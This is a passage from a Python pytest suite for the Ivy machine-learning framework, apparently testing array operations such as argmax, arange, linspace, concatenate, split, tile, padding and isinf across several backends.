ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.ceil)
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.abs)
# argmax
@pytest.mark.parametrize(
"x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# smoke test
x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
axis = x_n_axis_x_argmax[1]
ret = ivy.argmax(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmax)
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmin)
# argsort
@pytest.mark.parametrize(
"x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
axis = x_n_axis_x_argsort[1]
ret = ivy.argsort(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (6,)
# value test
assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argsort)
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Number type, or Union for Union[float, int] etc.
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.arange)
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.linspace)
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.logspace)
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.concatenate)
# flip
@pytest.mark.parametrize(
"x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
([[[-0.1471, 0.4477, 0.2214]]], None, None)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# smoke test
x, axis, bs = x_n_axis_n_bs
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.flip(x, axis, bs)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.flip)
# stack
@pytest.mark.parametrize(
"xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# smoke test
(x1, x2), axis = xs_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.stack((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = list(x1.shape)
expected_shape.insert(axis_val, 2)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.stack, (x1, x2), axis),
np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.stack)
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.unstack)
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.split)
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not union of types
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.repeat)
# tile
@pytest.mark.parametrize(
"x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw = x_n_reps
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.tile(x, reps_raw)
reps = ivy.array(reps_raw, 'int32', dev)
ret = ivy.tile(x, reps)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
else:
expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.tile, x, reps),
np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.tile)
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zero_pad)
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
[[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
-8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
-6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
1.0000000e+00]],
[[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
-2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
-1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
1.0000000e+00]],
[[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
-6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
-3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
1.0000000e+00]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype, dev)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2*num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.fourier_encode)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.constant_pad)
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.swapaxes)
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.transpose)
# expand_dims
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.expand_dims(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape.insert(axis, 1)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.expand_dims)
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support .type() method
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.where)
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.indices_where)
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isnan)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isinf)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
